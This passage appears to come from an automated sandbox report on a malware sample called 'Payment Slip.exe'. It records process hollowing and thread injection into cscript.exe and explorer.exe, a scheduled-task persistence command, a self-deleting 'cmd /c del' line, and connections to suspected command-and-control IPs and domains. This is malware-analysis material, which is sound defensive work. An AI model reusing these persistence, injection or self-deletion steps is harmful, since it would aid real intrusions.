            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05210EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05210EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05210EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051FFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05188EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05218ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_00409B30 LdrLoadDll,
            Source: C:\Users\user\Desktop\Payment Slip.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 45.207.75.185 80
            Source: C:\Windows\explorer.exeDomain query: www.b0ay.com
            Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.71 80
            Source: C:\Windows\explorer.exeDomain query: www.00333v.com
            Source: C:\Windows\explorer.exeDomain query: www.interweavelife.com
            Source: C:\Windows\explorer.exeDomain query: www.yuumgo.academy
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.axswallet.com
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
            Source: C:\Windows\explorer.exeNetwork Connect: 45.39.212.49 80
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\Payment Slip.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 11F0000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\Payment Slip.exeMemory written: C:\Users\user\Desktop\Payment Slip.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Payment Slip.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Payment Slip.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3424
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\uVxomBuy' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F38.tmp'
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Users\user\Desktop\Payment Slip.exe C:\Users\user\Desktop\Payment Slip.exe
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Users\user\Desktop\Payment Slip.exe C:\Users\user\Desktop\Payment Slip.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Slip.exe'
            Source: explorer.exe, 00000006.00000000.746546416.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000006.00000000.710234796.0000000001080000.00000002.00020000.sdmp, cscript.exe, 0000000D.00000002.934610574.00000000039E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.710234796.0000000001080000.00000002.00020000.sdmp, cscript.exe, 0000000D.00000002.934610574.00000000039E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.710234796.0000000001080000.00000002.00020000.sdmp, cscript.exe, 0000000D.00000002.934610574.00000000039E0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.710234796.0000000001080000.00000002.00020000.sdmp, cscript.exe, 0000000D.00000002.934610574.00000000039E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.733203652.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Users\user\Desktop\Payment Slip.exe VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
